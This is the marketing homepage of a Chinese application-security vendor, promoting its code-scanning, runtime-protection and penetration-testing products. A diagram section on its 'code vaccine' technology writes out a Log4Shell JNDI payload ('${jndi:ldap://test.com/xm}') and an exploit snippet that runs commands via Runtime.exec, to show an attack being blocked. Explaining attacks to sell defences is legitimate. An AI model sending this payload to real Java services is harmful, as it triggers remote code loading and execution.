• 首页
  • 产品与服务
  • 解决方案
  • 研究中心
  • 安全大会
  • 关于悬镜

缺陷扫描

灵脉SAST

白盒代码审计平台

开源治理

源鉴SCA

开源威胁管控平台

风险发现

灵脉IAST

灰盒安全测试平台

积极防御

云鲨RASP

自适应云防御平台

渗透模拟

灵脉PTE

自动化渗透测试平台
安全开发(SecDev)
夫子ASOC敏捷安全赋能平台
安全运营(SecOps)

咨询

SDL安全咨询

治理

开源治理

审计

源代码审计

应急

应急响应

渗透

渗透测试

演练

攻防演练

悬镜第三代DevSecOps智适应威胁管理体系

技术应用场景

DevSecOps敏捷安全

AST全流程安全测试

AI智能渗透测试

行业解决方案

金融电商

能源电力

高等教育

子芽说

三方观点

直播视频

资料报告

悬镜动态

公司简介

加入我们

合作伙伴

联系我们

智能代码疫苗技术
AI Code Vaccine Tech
随着数字对抗技术的演进,攻击方的手段从暴力破解、DDoS等高炮巨舰式手段进化为以数字供应链攻击为代表的更为精细化的入侵方案,静默化的攻击方式使得新型的网络威胁犹如数字基因病毒,越来越难以被感知。悬镜专利级智能代码疫苗技术的出现帮助软件应用获得了内生化的威胁积极侦测和防御能力,使得应用自免疫成为了可能。在与网络威胁无尽的斗争中,再一次,道高一丈。
Log4j2漏洞利用过程LogManager.getLogger(Log4j2.class).error("${jndi:ldap://test.com/xm}");//public String lookup(final LogEvent event, final String key) {if (key == null) {return null;}final String jndiName = convertJndiName(key);try(final JndiManager jndiManager = JndiManager.getDfaultManager()) {return Objects.toString(jndiManager.lookup(jndiName), null);// } catch(final NamingException e) { LOGGER.warn(LOOKUP, "Error looking up JNDI resource [{}].", jndiName, e); return null;}}public Exploit(String cmd) throws IOException,InterruptedException{final Process process = Runtime.getRuntime().exec(cmd); //printMessage(process.getInputStream());printMessage(process.getErrorStream());} public Process exec(String command) throws IOException {return exec(command, null, null); //}攻击者Step1:攻击者发送带有载荷攻击的请求植入攻击载荷成功Java应用Step2:应用请求下载恶意脚本请求恶意脚本成功攻击者服务器Step3:应用获取恶意脚本并执行执行恶意脚本成功LogManager.getLogger(Log4j2.class).error("${jndi:ldap://test.com/xm}");//public String lookup(final LogEvent event, final String key) {if (key == null) {return null;}final String jndiName = convertJndiName(key);try(final JndiManager jndiManager = JndiManager.getDfaultManager()) {return Objects.toString(jndiManager.lookup(jndiName), null);// } catch(final NamingException e) { LOGGER.warn(LOOKUP, "Error looking up JNDI resource [{}].", jndiName, e); return null;}}public Exploit(String cmd) throws IOException,InterruptedException{final Process process = Runtime.getRuntime().exec(cmd); //printMessage(process.getInputStream());printMessage(process.getErrorStream());} public Process exec(String command) throws IOException {aiVaccineBeforeCheck(); //return exec(command, null, null);}攻击者Step1:攻击者发送带有载荷攻击的请求植入攻击载荷成功Java应用自免疫Java应用智能代码疫苗Step2:应用请求下载恶意脚本请求恶意脚本成功攻击者服务器拦截Step3:应用获取恶意脚本并执行执行恶意脚本失败
灵脉SAST

灵脉SAST

白盒代码审计平台

探索更多
夫子ASOC敏捷安全赋能平台
DevSecOps智适应威胁管理
DevSecOps AI-Adaptive Threat Management

源鉴SCA

开源威胁管控平台

第三方组件漏洞检测

全面SBOM分析

许可证风险识别

探索更多

灵脉IAST

灰盒安全测试平台

智能代码疫苗技术

自动化插桩流程

全使用场景覆盖

探索更多

灵脉SAST

白盒代码审计平台

SCA深度联动

全主流开发语言覆盖

规则类型及行业标准全覆盖

探索更多

云鲨RASP

自适应云防御平台

应用威胁自免疫

函数级攻击面收敛

微秒级攻击拦截

探索更多

灵脉PTE

自动化渗透测试平台

应用系统脆弱性评估

7*24持续威胁模拟

自动化安全度量

探索更多

夫子ASOC

敏捷安全赋能平台

全流程弹性管控

全场景模式覆盖

第三方工具链对接

探索更多
悬镜灵脉IAST灰盒安全测试平台
Xmaze IAST Security Test Platform
通过全场景流量分析技术,如运行时插桩、启发式爬虫、代理/VPN及流量管家等和原创AI渗透启发技术赋能组织快速建立安全众测模式,防止应用带病上线。
单探针,All In One
All In One
传统系统级安全探针粒度粗浅且功能单一。作为智能代码疫苗技术的核心,悬镜函数级探针深钩在应用内存上下文之中,仅需安装一次,可支持IAST、RASP、SCA、API Fuzz、APM等应用安全检测响应能力。真正实现All in one,One for all。
开发测试发布运营智能探针 开启软件成分分析SCA 开启交互式安全测试 开启模糊测试IASTAPI Fuzz 开启出厂免疫RASP⑤威胁积极防御 持续红蓝对抗 开启应用性能管理RASPBASAPM
新一代积极防御框架
Next-Gen Active Defense Framework
传统的安全措施主要依赖以多环节威胁发现与治理为基础的被动式纵深防御体系,这一起源于前苏联图哈切夫斯基元帅在一战时的思想已难以满足如今愈发复杂的数字战场。以SCA、IAST、SAST、RASP、ASOC、PTE等工具链构筑的新一代积极防御体系,可在应用上线前实现出厂免疫,上线后进行持续积极防御、威胁模拟与安全效果度量,从而完成主动式全流程攻击面管理。
领导力评价
Recognized Leadership
研究中心
Research Center
查看更多
热点聚焦
Hot News
直播回顾

DevSecOps敏捷安全技术金字塔V3.0正式发布

2022年12月28日,由悬镜安全主办,3S-Lab软件供应链安全实验室、Linux基金会OpenChain社区、ISC、OpenSCA社区联合协办的第二届全球DevSecOps敏捷安全大会(DSO 2022)已通过全球直播的形式圆满举行。

2022-12-29

DSO 2022 | “共生·敏捷·进化”第二届全球DevSecOps敏捷安全大会圆满举行

2022年12月28日,由悬镜安全主办,3S-Lab软件供应链安全实验室、Linux基金会OpenChain社区、ISC、OpenSCA社区联合协办的第二届全球DevSecOps敏捷安全大会(DSO 2022)已通过全球直播的形式圆满举行。

2022-12-29

RASP技术进阶系列(三):重大漏洞自动化热修复

在上篇文章《RASP技术进阶系列(二):东西向Web流量智能检测防御》中提到,在企业日常安全运营以及HW场景下,应用漏洞攻击应急响应和恶意流量溯源分析是安全团队的重点工作。

2023-01-06

权威 | 悬镜安全首批入选信通院《软件供应链厂商和产品名录》

2022年12月13日,由中国信息通信研究院(以下简称“信通院”)主办的2022“3SCON软件供应链安全大会”成功召开,为了进一步提升软件供应链透明度,积极应对不断出现的软件供应链安全治理难题,并为行业用户选择合适的厂商及产品提供选型指导,会上正式发布了《软件供应链厂商和产品名录》等多项重磅成果。

2022-12-16
客户
Clients
原创专利级“全流程数字供应链安全赋能平台+敏捷安全工具链+供应链安全情报服务”的第三代DevSecOps数字供应链安全管理体系,创新赋能金融、车联网、通信、能源、政企、智能制造和泛互联网等行业用户,构筑起适应自身业务弹性发展、面向敏捷业务交付并引领未来架构演进的共生积极防御体系,持续守护中国数字供应链安全。
客户说
Comments

中体彩科技

张白冰

悬镜安全是具有团结拼搏精神的团队。他们能够在网络安全的大潮中抢抓机遇,沉着应对,不断提高自主创新能力,并致力于安全生态的发展,不忘为客户提供更多服务的本心,悬镜加油!

中信建投证券

张建军

做好DevSecOps敏捷安全体系建设,配套工具链技术的支撑非常重要。悬镜灵脉IAST灰盒测试平台作为一种新兴的交互式应用安全测试工具,在落地实践过程中体现出了高检出率、低误报率及柔和嵌入现有DevOps体系等新特性,可为证券行业的数字化业务系统提供相对准确的安全测试和审查帮助。

榆次融信银行

刘波

悬镜安全在信息安全领域毫无疑问是非常专业的,而我觉得相比专业能力来说,他们更为值得肯定的是一种认真细致,勇于担当的精神,这是众多企业予以托付的根本。

合作伙伴
Partners
携手合作伙伴,开拓百亿级蓝海市场,共同助力企业DevSecOps落地,实现客户业务与安全融合增长。
解决方案
Solutions
悬镜安全为金融、车联网、通信、能源、政企、智能制造和泛互联网等上千家行业用户打造最佳实践。
行业解决方案
技术场景方案

银行机构解决方案

银行服务机构一直是网络攻击者最感兴趣的目标。在线应用的漏洞、未经保护的应用程序和日益增长的公有云服务正在迅速扩大攻击面。网络黑客不断攻击这些易受攻击的系统,这些系统是金融企业需要重点保护的对象。

荣誉资质
Awards and Certifications
荣誉
资质

北京总部

北京市海淀区中关村软件园一期27号楼

西南研发中心

四川省成都市金牛区金科南路169号1栋

华中研发中心

湖南省长沙市岳麓区柏宁地王广场北栋

华东运营中心

上海市浦东新区张江微电子港一号楼

华南运营中心

广东省深圳市南山区高新南七道国信投资大厦
广东省广州市海珠区保利世界贸易中心

杭州分部

浙江省杭州市萧山区萧山商会大厦C幢

敏捷安全驱动,守护中国数字供应链安全

申请试用
AI赋能敏捷安全
智能代码疫苗技术
DevSecOps智适应威胁管理
悬镜灵脉IAST灰盒安全测试平台
单探针,ALL In One
新一代积极防御框架
领导力评价
研究中心
热点聚焦
客户
客户说
合作伙伴
解决方案
荣誉资质
公司分部

顾问小镜

悬镜安全

在线咨询

CHAT WITH US